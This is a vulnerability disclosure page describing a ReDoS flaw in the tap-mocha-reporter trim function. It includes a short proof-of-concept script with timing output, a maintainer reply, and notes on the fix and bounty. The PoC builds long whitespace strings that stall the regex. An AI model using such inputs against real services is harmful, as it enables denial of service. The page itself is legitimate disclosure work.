Inefficient Regular Expression Complexity in tapjs/tap-mocha-reporter

Valid

Reported on

Sep 21st 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in tap-mocha-reporter.

The ReDoS vulnerability is mainly due to the regex /^\s+|\s+$|/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var tapMochaReporter = require("tap-mocha-reporter/lib/utils.js")

for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str ='a' +' '.repeat(i*10000)+"a";
    tapMochaReporter.trim(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

The Output

"attack_str.length: 10002: 110 ms"
"attack_str.length: 20002: 408 ms"
"attack_str.length: 30002: 854 ms"
"attack_str.length: 40002: 1521 ms"
"attack_str.length: 50002: 2485 ms"
"attack_str.length: 60002: 3466 ms"

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md 8 months ago
We have contacted a member of the tapjs/tap-mocha-reporter team and are waiting to hear back 7 months ago
We have sent a second follow up to the tapjs/tap-mocha-reporter team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the tapjs/tap-mocha-reporter team. This report is now considered stale. 7 months ago
isaacs
3 months ago

Maintainer


I'm not sure how an attacker would ever manage to call this function, so this feels like a self-pwn, but point of fact, String.trim() is supported on all platforms that can run tap-mocha-reporter (and in fact, String.trim() is used elsewhere in the library), and that performs much better anyway. Fixed on https://github.com/tapjs/tap-mocha-reporter/commit/50c8c31ed7f6ebf18de4339ee0e64b1558b07e83

isaacs validated this vulnerability 3 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
isaacs confirmed that a fix has been merged on 50c8c3 3 months ago
isaacs has been awarded the fix bounty
utils.js#L261 has been validated
to join this conversation